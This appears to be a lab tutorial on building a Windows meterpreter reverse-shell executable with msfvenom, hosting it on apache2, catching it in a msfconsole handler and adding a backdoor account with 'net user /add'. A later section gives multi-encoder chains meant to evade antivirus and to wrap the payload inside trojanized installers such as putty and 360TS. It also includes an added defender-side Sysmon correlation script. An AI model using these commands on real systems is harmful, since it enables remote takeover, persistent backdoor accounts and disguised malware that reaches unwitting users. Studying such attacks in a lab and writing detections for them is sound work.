DIY Virus

Environment:

Solution

  • Use Msfvenom to build various payloads.
  • Deploy the payloads to a web server.

Check internet

  • Check that these servers are connected to the same LAN
    • Use the ping command to check
    • Make sure your attack server can connect to the internet once we finish building the virus

Using Msfvenom

  • Before using this tool, we need the following information:

    • Which OS we are attacking (Linux, Mac, etc.).
    • Which way we attack. In this case, we use a web site to attack.
    • The IP of the attacked host.
    • Where to deploy the virus.
  • Since we attack through the web, we build the virus in the apache2 web service.

  • Use this command to build the virus

    msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.43.132 LPORT=7749 -f exe > /var/www/html/cmds.exe

    • Method:
      -p payload
      -f format
          output file format (exe here)
      reverse_tcp:
          no need to know the IP
          no extra rule is needed to connect
      windows
          can be changed to another platform: Android, Unix, Linux, etc.
      LHOST
          Local host
      RHOST / RPORT
          The attacked port
      
  • Success message

    [-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
    [-] No arch selected, selecting arch: x86 from the payload
    No encoder specified, outputting raw payload
    Payload size: 354 bytes
    Final size of exe file: 73802 bytes
    
  • Check the virus file

    ls /var/www/html/
    


Deploy

We deploy the virus on the apache2 service, so the apache2 service must be restarted; then check the download URL.

  • Restart apache2 service
    service apache2 restart

  • Check the service is working
    service apache2 status
    

Msfconsole

Metasploit is a project built by Rapid7 for penetration testing. Msfconsole is Metasploit's command-line interface. Armitage is a GUI for Metasploit built in Java. In this case, we use msfconsole to set up a handler that connects to the server being attacked.

  • Open Metasploit's msfconsole

    msfconsole
    


  • Create a handler

    use exploit/multi/handler

  • Set the payload

    set payload windows/meterpreter/reverse_tcp

  • Set lhost

    set lhost 192.168.43.132

  • Set lport

    set lport 7749

  • Start the handler

    run

  • Setup succeeded


Download the virus on Windows and test it

  • Open a browser on Windows.
  • Open the attack server's web site using the attack server's IP.
  • Add the file name cmds.exe to the end of the URL to download the virus.
  • Back on Kali Linux, check the msfconsole status.
    When the virus works successfully, msfconsole changes to a meterpreter prompt to control the attacked server.

Control and Attack server

This is a simple example of controlling the attacked server to add a user.

  • Check all the users before the attack.
    There is no user called jack, so I'll add a user called jack.


  • Open PowerShell first

    shell
    


  • Use this command to add the jack account and set its password to 123456

    net user /add jack 123456
    
  • Back on the attacked server, there is a new jack account.

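From the defender's side, the chain this walkthrough produces (a file written by the browser, run from the download folder, connecting out to port 7749, then spawning `net user /add`) can be correlated in endpoint telemetry. The following is an added example, not part of the original page; the event records, the user name bob, the PIDs and the field names are constructed for illustration and are modeled on Sysmon event IDs 1, 3 and 11.

```python
import re

# Constructed Sysmon-style events (not real telemetry; user "bob", PIDs and
# field names are made up). EventID 1 = process create, 3 = network
# connection, 11 = file create.
EVENTS = [
    {"id": 11, "image": r"C:\Program Files\Browser\browser.exe",
     "target": r"C:\Users\bob\Downloads\cmds.exe"},
    {"id": 1, "pid": 4100, "ppid": 900, "cmdline": "cmds.exe",
     "image": r"C:\Users\bob\Downloads\cmds.exe"},
    {"id": 3, "pid": 4100, "image": r"C:\Users\bob\Downloads\cmds.exe",
     "dst_ip": "192.168.43.132", "dst_port": 7749},
    {"id": 1, "pid": 4200, "ppid": 4100, "cmdline": "cmd.exe",
     "image": r"C:\Windows\System32\cmd.exe"},
    {"id": 1, "pid": 4300, "ppid": 4200, "cmdline": "net user /add jack 123456",
     "image": r"C:\Windows\System32\net.exe"},
    # Benign: an administrator lists accounts from an ordinary console.
    {"id": 1, "pid": 5000, "ppid": 700, "cmdline": "net user",
     "image": r"C:\Windows\System32\net.exe"},
]

ADD_ACCOUNT = re.compile(r"\bnet1?(\.exe)?\s+(user|localgroup)\b.*\s/add\b", re.I)
USER_WRITABLE = re.compile(r"\\(Downloads|Temp|AppData)\\", re.I)
COMMON_PORTS = {80, 443}

def ancestors(pid, procs):
    """Yield process-create events up the parent chain, starting at pid."""
    seen = set()
    while pid in procs and pid not in seen:
        seen.add(pid)
        yield procs[pid]
        pid = procs[pid]["ppid"]

def detect(events):
    """Return (command line, originating image) for account creation that
    descends from a freshly written binary talking to an unusual port."""
    procs = {e["pid"]: e for e in events if e["id"] == 1}
    dropped = {e["target"].lower() for e in events if e["id"] == 11}
    beacons = {e["pid"] for e in events if e["id"] == 3
               and e["dst_port"] not in COMMON_PORTS
               and USER_WRITABLE.search(e["image"])}
    alerts = []
    for e in procs.values():
        if not ADD_ACCOUNT.search(e["cmdline"]):
            continue
        for a in ancestors(e["ppid"], procs):
            if a["pid"] in beacons and a["image"].lower() in dropped:
                alerts.append((e["cmdline"], a["image"]))
    return alerts
```

Calling `detect(EVENTS)` flags only the `net user /add jack 123456` process, because its ancestor is the downloaded binary that opened the connection; the plain `net user` listing is ignored.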

Challenge: use VirusTotal to get a score

  • Use VirusTotal to get the score of your virus, cmds.exe.


  • Try using another encoder.

    msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.43.132 LPORT=12345 -e x86/shikata_ga_nai -i 9 -f raw -b "\x00" > eoncodex.exe
    

  • Try building on another exe file; this case uses 360TS.

    msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 20 LHOST=192.168.43.132 LPORT=7749 -f raw | msfvenom -a x86 --platform windows -e ruby/base64 -i 10 -f raw | msfvenom -a x86 --platform windows -e cmd/echo -i 10 -x 360TS_Setup_Mini.exe -f exe > 360Installer.exe
    

  • Try building on another exe file; this case uses putty.

    msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.43.132 LPORT=7749 -f raw -e x86/shikata_ga_nai -i 9 | msfvenom -a x86 --platform windows -e x86/countdown -i 8 -f raw | msfvenom -a x86 --platform windows -e x86/shikata_ga_nai -i 11 -f raw | msfvenom -a x86 --platform windows -e x86/countdown -i 6 -f raw | msfvenom -a x86 --platform windows -e x86/shikata_ga_nai -i 7 -x putty.exe -o putty2.exe
    

Reference